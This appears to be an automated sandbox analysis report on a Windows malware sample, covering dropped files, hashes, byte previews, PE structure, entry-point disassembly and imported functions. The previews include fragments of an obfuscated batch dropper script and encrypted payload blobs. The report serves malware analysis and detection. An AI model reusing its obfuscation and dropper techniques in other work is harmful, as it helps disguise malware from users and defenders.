                                                                                                    • Antivirus: ReversingLabs, Detection: 5%
                                                                                                    Joe Sandbox View:
• Filename: Okfjk1hs4kdhs2.exe, Detection: malicious
• Filename: 1XZFfxyWZA.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: ZnPyVAOUBc.exe, Detection: malicious
• Filename: 1WDpq6mvnr.exe, Detection: malicious
• Filename: 1WDpq6mvnr.exe, Detection: malicious
• Filename: Setup.exe, Detection: malicious
• Filename: Setup.exe, Detection: malicious
• Filename: Setup.exe, Detection: malicious
• Filename: SecuriteInfo.com.Win32.Malware-gen.11524.25894.exe, Detection: malicious
                                                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):224434
                                                                                                    Entropy (8bit):7.999153286358092
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:t3+D+6cImItj8aknXlll/tzfZHLc5E7D7qlqPYmzgAsVwVZhPlDxad4pE31eG5zf:IDhmlakFxqi7D7lgr6VZJJ/E1vr3z
                                                                                                    MD5:7C55F7CB1AF93F36A36462DAEB277E12
                                                                                                    SHA1:7997EC97A93B98E63B4297CCE8536AA5ACC4391F
                                                                                                    SHA-256:8A787B23BD5BEF3D04590F9B0FE65B2D8DD68B1239A8BF64B3B4F4F6A2ED0633
                                                                                                    SHA-512:482F6AA7D330F3B1647743C13792FEACA175A1A5DD5959241412F9EB89251FAAE5D4821591EC44B81E96565CE50A63ECEC91E35CC34AAB158EF09F05F6FABC01
                                                                                                    Malicious:false
                                                                                                    Preview:..b.oZ....S....}$...8..;..e/...f....!......Z..M....xg.bc4...^....=...\S..E.A..w.n.E5......;LX..mi..|..N`...!..0j.=..%.0do.]..n.../.....CYft._T.......zQv.H...(.J..5.\..v...x...A.b.p(5..C....P.L......U.8....q.Rl:S`!z.?.J.T.@..v.[....&.j...]....).2...oq..G.M....h.0T. &..]hqgH..M.)...G.m.."*..g.`......c....Hid<..~..7ib...8.hv~.x...7w{..r'4w%..._..(&z..'._.`...b..N...\.B-:.C.....hq..&.S>5W.pUG..V.\.c.L.,.$BW.t.]..X(..x'm{..l..Cm...{.hN\o...?,....-..i..h....F.....l..@^4n;_.t8 .?...D.E.A......z.a.P.Tpl.N.,`.L.%<....Q.&H....AY..:.|.2.B.....G*O..js...9)H.h...,p{.93T.....Z...m....H.z.C../......N..Y.......GN...<(ra8. ...Xp.e5..>..D. .K....(".f..X.......~E..........Q..c"....j....2..O(.9$............N..n...;..6.I.GX.....N...O.K~....=OA..0...X...f.V..s:.s@.v.j.`.t.......<K.D.....HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.K
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\438799\Dump.pif
                                                                                                    File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65440
                                                                                                    Entropy (8bit):6.049806962480652
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:X8XcJiMjm2ieHlPyCsSuJbn8dBhFwlSMF6Iq8KSYDKbQ22qWqO8w1R:rYMaNylPYSAb8dBnsHsPDKbQBqTY
                                                                                                    MD5:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                    SHA1:230AB5559E806574D26B4C20847C368ED55483B0
                                                                                                    SHA-256:C066AEE7AA3AA83F763EBC5541DAA266ED6C648FBFFCDE0D836A13B221BB2ADC
                                                                                                    SHA-512:F96CF9E1890746B12DAF839A6D0F16F062B72C1B8A40439F96583F242980F10F867720232A6FA0F7D4D7AC0A7A6143981A5A130D6417EA98B181447134C7CFE2
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0.............^.... ........@.. ....................... .......F....`.....................................O.......8................A........................................................... ............... ..H............text...d.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................@.......H........A...p..........T................................................~P...-.r...p.....(....(....s.....P...*..0.."........(......-.r...p.rI..p(....s....z.*...0..........(....~P.....o......*..(....*n(.....(..........%...(....*~(.....(..........%...%...(....*.(.....(..........%...%...%...(....*V.(......}Q.....}R...*..{Q...*..{R...*...0...........(.......i.=...}S......i.@...}T......i.@...}U.....+m...(....o .....r]..p.o!...,..{T.......{U........o"....+(.ra..p.o!...,..{T.......
                                                                                                    Process:C:\Users\user\Desktop\DA92phBHUS.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6079
                                                                                                    Entropy (8bit):6.1454181190325885
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:xxgUzr4tgOwVAfBzDICS09CAi6R7u+IhsObfS+NsPvj6ooxdofjxP3yGj1H039LL:3HAeOqAFDw09CV/2nPvj6DdMP3r1HI5L
                                                                                                    MD5:7C69FC2B30363C5DF405306DD8A0BE9F
                                                                                                    SHA1:F87ECB504029520A1A143EAF3277558A25199CEB
                                                                                                    SHA-256:FB0B8C6E6D54F43174A71C7B42C0BD0B7CF2140F52AAAB514BB06ECCE15F80D1
                                                                                                    SHA-512:F55B924A391880EF37DEDC9BB7C7F541636EE936DEF17E4BFCBE46A9536128D75B4BF878AB869B0C3A686FD0FEC73376D196A8E2FE49643B1405EFEA057749D6
                                                                                                    Malicious:false
                                                                                                    Preview:pantyhoseyourslandscapesdisposition..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B...........................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\DA92phBHUS.exe
                                                                                                    File Type:ASCII text, with very long lines (304), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7130
                                                                                                    Entropy (8bit):5.155214984436157
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:QQmwxz2Dt7hgS/ryUml7U5MW2zgzn/T22D:FWyUmVCMWrPD
                                                                                                    MD5:674742A294AE6EE0A685696CA91D9913
                                                                                                    SHA1:DEF90DB4C44FDF4EC1D8698477434E3960063342
                                                                                                    SHA-256:A7233C9A08756C3EB05C6253A7A6C2EF9EC4F36816A8A733AE5280BF0E28CEA6
                                                                                                    SHA-512:FCB0074E54970CF1491F9D6DA442E92797563917295EC65FD01F3CDE5A43262F3A8423F1E2BA904C0E06F401E73A67E98DFD855328672B77A966957A9806D8FC
                                                                                                    Malicious:false
                                                                                                    Preview:Set Expanding=6..FiDh-Component-Tracks-..opTvcom-Lowest-Outline-Democrat-Raid-Directly-Vertical-Backgrounds-..KCrAud-Impact-Styles-Wild-..TQAChase-Associates-Madrid-Invite-Nutrition-Pleased-Tyler-Replace-Admitted-..BedNa-Fingers-Recording-Chelsea-Van-Kick-Ill-Stated-Lions-..MhQUnauthorized-Nitrogen-Ee-..zWzProvides-Devoted-Pay-Dublin-Cb-Nowhere-..iCaNDocuments-Overnight-Probe-Questionnaire-Sunset-..Set Lodging=G..QkISupreme-Shed-Initial-Folding-Example-Attractive-Improved-..wSDemocratic-Financing-..WcHThereby-Most-Geology-Guru-Infrastructure-Alphabetical-..zoIRCount-Mcdonald-Motels-Calgary-Newsletters-Justice-Ahead-..fcfTicket-Welsh-Resorts-Bm-Compilation-..VdSlBeen-Friendship-Invoice-..cbWRoses-Got-Discussion-Patents-Nevada-Php-Cream-Take-Impression-..ffnTowers-Language-Jeans-..PlReset-Lg-Trails-Activities-Dealers-..Set Albert=r..FZgSense-Ranges-..DHPregnancy-Pcs-Patient-Borders-Africa-Spider-Flag-Powers-Similarly-..JEEAIndie-..FSEwBackgrounds-Helena-Continue-Institution-Ict-Holders-L
                                                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                    File Type:ASCII text, with very long lines (304), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7130
                                                                                                    Entropy (8bit):5.155214984436157
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:QQmwxz2Dt7hgS/ryUml7U5MW2zgzn/T22D:FWyUmVCMWrPD
                                                                                                    MD5:674742A294AE6EE0A685696CA91D9913
                                                                                                    SHA1:DEF90DB4C44FDF4EC1D8698477434E3960063342
                                                                                                    SHA-256:A7233C9A08756C3EB05C6253A7A6C2EF9EC4F36816A8A733AE5280BF0E28CEA6
                                                                                                    SHA-512:FCB0074E54970CF1491F9D6DA442E92797563917295EC65FD01F3CDE5A43262F3A8423F1E2BA904C0E06F401E73A67E98DFD855328672B77A966957A9806D8FC
                                                                                                    Malicious:false
                                                                                                    Preview:Set Expanding=6..FiDh-Component-Tracks-..opTvcom-Lowest-Outline-Democrat-Raid-Directly-Vertical-Backgrounds-..KCrAud-Impact-Styles-Wild-..TQAChase-Associates-Madrid-Invite-Nutrition-Pleased-Tyler-Replace-Admitted-..BedNa-Fingers-Recording-Chelsea-Van-Kick-Ill-Stated-Lions-..MhQUnauthorized-Nitrogen-Ee-..zWzProvides-Devoted-Pay-Dublin-Cb-Nowhere-..iCaNDocuments-Overnight-Probe-Questionnaire-Sunset-..Set Lodging=G..QkISupreme-Shed-Initial-Folding-Example-Attractive-Improved-..wSDemocratic-Financing-..WcHThereby-Most-Geology-Guru-Infrastructure-Alphabetical-..zoIRCount-Mcdonald-Motels-Calgary-Newsletters-Justice-Ahead-..fcfTicket-Welsh-Resorts-Bm-Compilation-..VdSlBeen-Friendship-Invoice-..cbWRoses-Got-Discussion-Patents-Nevada-Php-Cream-Take-Impression-..ffnTowers-Language-Jeans-..PlReset-Lg-Trails-Activities-Dealers-..Set Albert=r..FZgSense-Ranges-..DHPregnancy-Pcs-Patient-Borders-Africa-Spider-Flag-Powers-Similarly-..JEEAIndie-..FSEwBackgrounds-Helena-Continue-Institution-Ict-Holders-L
                                                                                                    Process:C:\Users\user\Desktop\DA92phBHUS.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):57522
                                                                                                    Entropy (8bit):7.996625480512146
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:768:TjNlqwJ/mmjrtGesZk4Rraajw+ZcG7dsoH12Q2IhdzNXt59udwzVX3Oppwvoihb5:tlqYj8tBOa5P7aQrhdzL59u4tOGj
                                                                                                    MD5:06330D422DF60304B4BA3F65E50EFD3B
                                                                                                    SHA1:14084105F183A59B0D6F5556D0CCD40059B5A989
                                                                                                    SHA-256:E833449BE64833FFF70A2B81D72BC9E79D46676B30F9BD47D9FA2C51F26D7241
                                                                                                    SHA-512:B28E9E2DCDA6046A9D0207EF3D6C1A5183E9BD2490031C9CB8D42336D06EBAD43C51B57A99572CF679416CC7610FD25A4C2475287E4728AB31261E222121B30C
                                                                                                    Malicious:false
                                                                                                    Preview:.S.#7.g.g?....6.`G.|.kSq^.@..V.7..s.O.Z.z.#.P3|..&u.z......)86...|g....u3...q..*..s7CD.<cs[ _.|}...'.......Em.W....~._.s1....A....;<......_.-cl.O.6fY D...I$..~QC......Bl...,._...r.`D^.....ul..........O.....%..(..W03.,"...ES~....=.{.G7...ez\.E...K.J.F.[...a5..`nBc....h..f..f......zI%......"..........F..|~.y.......Eyq..F......N..*?.WjR$..D...oo....@XVb.p.C....#...`.m..K.9@kE*..-B..EAt.B_..~.)...{.9w..p.d.....qZ..0.)..r.T..\D.@...z....5...7...q..lB.....i......X.3..@..|..@..C...U,...:...MP..T..l?.......2.....K.+.2..R..vg.."..B~...w.5.it$..zmc..0..[U..(........;..YN......A.b.....0..Kh...a6...f[:....n.JT\U.-.W/.*..t6...9....x.9.=...o...c......A.{.8........H.....x..b.Qn....<..P.I:b......}.@..S5%.Y..F..qyl."....n.3...KS....v..k=m.+.."R1...CN...k*....W0(.5.W.\d...f.r.......1.A.-.....r0...<.bms.[K..)44 S..b...&.L..R5B.....PQ|.|m.c.7.W..JI??......<.......6.....|B.Ky./.s...i....3..YxYn.H.[.L.....JO...^..2w...L.3.e...........".e.....
                                                                                                    Process:C:\Users\user\Desktop\DA92phBHUS.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):72704
                                                                                                    Entropy (8bit):7.997899525914667
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:UzhqN4gqPYiLzLfE7MsVweop2gZhPlDopsvPid4npE318:RlqPYmzgAsVwVZhPlDxad4pE318
                                                                                                    MD5:0058D41F87A34C360BD93510DB25C6D1
                                                                                                    SHA1:A186EF494091CC652C03E232B16BC98C5A5714AA
                                                                                                    SHA-256:42A9FD93F9537CF54282FB095AE2EAB4BB35A44F5073EBDE4DA10B0DF7A621D7
                                                                                                    SHA-512:860EAAA02B6F40D525AAB88ED112A67D9790216A045E29BF20971253CCDB770DD767C0008B30369C9F6B428661CDED2A7B442AB886BAD9E60E2F3DA6B2545C72
                                                                                                    Malicious:false
                                                                                                    Preview:...q.....RC...,..#U...Z....J5/.q..|.l_..N....8.2GT.\....w.-.I...b.^[.4.,..~M.ho...8.g..cP..b...y5.e.Y.j....w.=._j.|.g...=.....S....][PW.d..oT...."...#)zm1.-a,.0d.."B.B..^.~<""...n^.... ..3.N..z.@.o.'.A..;..{...].~.b.......r(J.t[....I....;JX...-d/....$!..4;..J%....{X...%D.S$4..G;..9@..3.......4q4...W._..*...O4.W...%.....9...Za....kJ..0.....su.m..N..JrtL....%$...K...M.a;>.^......q.H.8/.`......w...0S.z...$.b.?y.p..;...7.yn...fU.6uP~gM../."n..Q.1.v".....x.hD.......?u..p..y..@s..."'..a.\..d..b.....#...........R.+rpP...h...{E?.....J.l~#eS...Z.vS.j.{......]K.<.)....Of..K>7.&...eR.*F......P._.S.. N:m...z...'..........E".;)0QiJ1 ........B...1.e.T"...9w.+c0...+...."Y.....=A..!<'...7s...;......k..=3.'.&1..:..E{.O6,....:..d.C.!a|.....I8.....).....J..u.v..D'T..b.`{-...5..2.{......aR....TW.?.... .F....u66|..1.9.Tw~....?..N.`....T.{..T.a...C:...........T..j....D....m..,.S..)A.y.<\..D.....^[...0G..5...q.k<2WN.3\.T1...C....z..>.P~....o..8)
                                                                                                    Process:C:\Users\user\Desktop\DA92phBHUS.exe
                                                                                                    File Type:OpenPGP Public Key
                                                                                                    Category:dropped
                                                                                                    Size (bytes):887566
                                                                                                    Entropy (8bit):6.622227307471724
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:rV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:xxz1JMyyzlohMf1tN70aw8501
                                                                                                    MD5:575FAB4EA3AD0352F99FB2F1B40904B2
                                                                                                    SHA1:C6C98243BF86A6CE11149CA68A1AF80926275EFE
                                                                                                    SHA-256:2023B2B1B846879C0299968AF3CB8FCA736B29533B1488D317EA7B9CDC96537C
                                                                                                    SHA-512:DD71A2BAD3F116D098B3A3DC4B73F9E2CCC368649E08FF1D6C471544FDD8021A16679248EF46D364FA1585996C8EFCBAD41C03857B77A86FDD24CB007EC6C21E
                                                                                                    Malicious:false
                                                                                                    Preview:.f.E.f.......f.E.f.......U..wL..M..........E....t..AX.E....t..A\.E...~..A`.E...~..Ad]...U..Q..xL.V.u.Wj.....8W................4xL.j.Z.U.;........$xL.....0.........F.;G.............................................}...VW.....~d.......~h.......~D........~P.......>.t..6..<.I..&..u...wL..x.....4xL..U.B.U.;...V....u... .........$..........xL........t.Q........xL..... ....wL.J...wL.;5.xL.u....xL.....xL.........._^..u..5.wL.R....I..%.wL.....xL...t...xL..D...8.u...xL.........]...U.....M...xL.SVW.....wL..u....]......j....E....(.I..{L...t..{L.....}....$xL.......KH..yi..........wq....&@..$.e&@..E...........}....{L.uUj...(.I.P.u... .I..}........j..u...8.I.j.....I._^[..]..........t....j...........E...sL.k.C.P&@.W&@..%@...C..%@.W&@................................U..8xL.....M.....t...9.t..@...M..J....@...]...Q.M..E.......H.I..E..8xL..E.P......E...U..M....t.W.}......N..._]...U..QQSVW.}..E.P..7....I..E...l....E...p....E.PV..p.I..M..E.;.t...uc;.x...u[.s..5..I....s........E.......E....
                                                                                                    Process:C:\Users\user\Desktop\DA92phBHUS.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):94208
                                                                                                    Entropy (8bit):7.998092078457812
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:t2K13O1LDzK6cIppQTIUIj8akLPaebXllVr/9PzOr3ByZHkyirghi5rI7V2CtFg:t3+D+6cImItj8aknXlll/tzfZHLc5E7A
                                                                                                    MD5:AF1C4B06A417402CB7499CAFB8F20DC9
                                                                                                    SHA1:D15CFE3DF9118D5443CF1ECB2169E648B08984F2
                                                                                                    SHA-256:C5039FA8D454C8042BB41D5398E524805197EC753CB68B18F1C3E32B063EEC2B
                                                                                                    SHA-512:3A711C1F919E86F6DBE0AF6CFB244E03BCAB6744E810CE0BB145A0DA221EB20E359F9C54109AE1EF9BB85844EFA5BB0E6B611831EAA75C9C011805AC627AF49E
                                                                                                    Malicious:false
                                                                                                    Preview:..b.oZ....S....}$...8..;..e/...f....!......Z..M....xg.bc4...^....=...\S..E.A..w.n.E5......;LX..mi..|..N`...!..0j.=..%.0do.]..n.../.....CYft._T.......zQv.H...(.J..5.\..v...x...A.b.p(5..C....P.L......U.8....q.Rl:S`!z.?.J.T.@..v.[....&.j...]....).2...oq..G.M....h.0T. &..]hqgH..M.)...G.m.."*..g.`......c....Hid<..~..7ib...8.hv~.x...7w{..r'4w%..._..(&z..'._.`...b..N...\.B-:.C.....hq..&.S>5W.pUG..V.\.c.L.,.$BW.t.]..X(..x'm{..l..Cm...{.hN\o...?,....-..i..h....F.....l..@^4n;_.t8 .?...D.E.A......z.a.P.Tpl.N.,`.L.%<....Q.&H....AY..:.|.2.B.....G*O..js...9)H.h...,p{.93T.....Z...m....H.z.C../......N..Y.......GN...<(ra8. ...Xp.e5..>..D. .K....(".f..X.......~E..........Q..c"....j....2..O(.9$............N..n...;..6.I.GX.....N...O.K~....=OA..0...X...f.V..s:.s@.v.j.`.t.......<K.D.....HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.K
                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Entropy (8bit):5.987624667522481
                                                                                                    TrID:
                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                    File name:DA92phBHUS.exe
                                                                                                    File size:3'145'765 bytes
                                                                                                    MD5:649673218a19e8fd278c99d1355949f4
                                                                                                    SHA1:da2b13b98dbb3ba3973388866860cb7cb3d2b59e
                                                                                                    SHA256:7a2c1437ed5ff19adf078f17881fc836a4b08d3eaaff243d5ca77577f5880169
                                                                                                    SHA512:5e6fab9f007e3015cc743f1ac962d77df7c479b4863e88fafc05a3a57896d7f3359afb91b18dcc88883a56c017c4fe279267a300effc37bf71c186fb080a00cd
                                                                                                    SSDEEP:24576:1az71UBrCXaw68FowF0vkf2fkAJzGthOXUKqx3Weeg:szRUDyFMPsAB0OXAV
                                                                                                    TLSH:FBE5F9C25B241316C916E592BF5F188817B17F9A7822BF6D9059A401E7FFA0E837F342
                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8.....
                                                                                                    Icon Hash:fef0f2fafc8de670
                                                                                                    Entrypoint:0x403883
                                                                                                    Entrypoint Section:.text
                                                                                                    Digitally signed:true
                                                                                                    Imagebase:0x400000
                                                                                                    Subsystem:windows gui
                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                    Time Stamp:0x4F47E2DA [Fri Feb 24 19:19:54 2012 UTC]
                                                                                                    TLS Callbacks:
                                                                                                    CLR (.Net) Version:
                                                                                                    OS Version Major:5
                                                                                                    OS Version Minor:0
                                                                                                    File Version Major:5
                                                                                                    File Version Minor:0
                                                                                                    Subsystem Version Major:5
                                                                                                    Subsystem Version Minor:0
                                                                                                    Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                                                                    Signature Valid:
                                                                                                    Signature Issuer:
                                                                                                    Signature Validation Error:
                                                                                                    Error Number:
Instruction
sub esp, 000002D4h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+18h], ebp
mov dword ptr [esp+10h], 00409268h
mov dword ptr [esp+14h], ebp
call dword ptr [00408030h]
push 00008001h
call dword ptr [004080B4h]
push ebp
call dword ptr [004082C0h]
push 00000008h
mov dword ptr [00472EB8h], eax
call 00007F9890CB707Bh
push ebp
push 000002B4h
mov dword ptr [00472DD0h], eax
lea eax, dword ptr [esp+38h]
push eax
push ebp
push 00409264h
call dword ptr [00408184h]
push 0040924Ch
push 0046ADC0h
call 00007F9890CB6D5Dh
call dword ptr [004080B0h]
push eax
mov edi, 004C30A0h
push edi
call 00007F9890CB6D4Bh
push ebp
call dword ptr [00408134h]
cmp word ptr [004C30A0h], 0022h
mov dword ptr [00472DD8h], eax
mov eax, edi
jne 00007F9890CB464Ah
push 00000022h
pop esi
mov eax, 004C30A2h
push esi
push eax
call 00007F9890CB6A21h
push eax
call dword ptr [00408260h]
mov esi, eax
mov dword ptr [esp+1Ch], esi
jmp 00007F9890CB46D3h
push 00000020h
pop ebx
cmp ax, bx
jne 00007F9890CB464Ah
add esi, 02h
cmp word ptr [esi], bx
Programming Language:
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ C ] VS2010 SP1 build 40219
• [RES] VS2010 SP1 build 40219
• [LNK] VS2010 SP1 build 40219
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9b34 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf4000 | 0x20d4a | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xa2d9b | 0x1b40 | .ndata
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7a000 | 0x964 | .ndata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2d0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6dae | 0x6e00 | 00499a6f70259150109c809d6aa0e6ed | False | 0.6611150568181818 | data | 6.508529563136936 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x2a62 | 0x2c00 | 07990aaa54c3bc638bb87a87f3fb13e3 | False | 0.3526278409090909 | data | 4.390535020989255 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xb000 | 0x67ebc | 0x200 | 014871d9a00f0e0c8c2a7cd25606c453 | False | 0.203125 | data | 1.4308602597540492 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x73000 | 0x81000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xf4000 | 0x20d4a | 0x20e00 | 8040873642d29b408feb2fb307b1d0e8 | False | 0.9612048479087453 | data | 7.853116998357041 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x115000 | 0xf32 | 0x1000 | 888a04c908eecf15f67b9530e701c84b | False | 0.58984375 | data | 5.424024474980326 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xf4238 | 0x1d901 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9963828258553625
RT_ICON | 0x111b3c | 0x2668 | Device independent bitmap graphic, 48 x 96 x 32, image size 9792 | English | United States | 0.6490032546786005
RT_ICON | 0x1141a4 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.8430851063829787
RT_DIALOG | 0x11460c | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x11470c | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x114828 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x114888 | 0x30 | Targa image data - Map 32 x 55553 x 1 +1 | English | United States | 0.8541666666666666
RT_VERSION | 0x1148b8 | 0x1bc | data | English | United States | 0.5337837837837838
RT_MANIFEST | 0x114a74 | 0x2d6 | XML 1.0 document, ASCII text, with very long lines (726), with no line terminators | English | United States | 0.5647382920110193
DLL | Import
KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll | GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll | RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
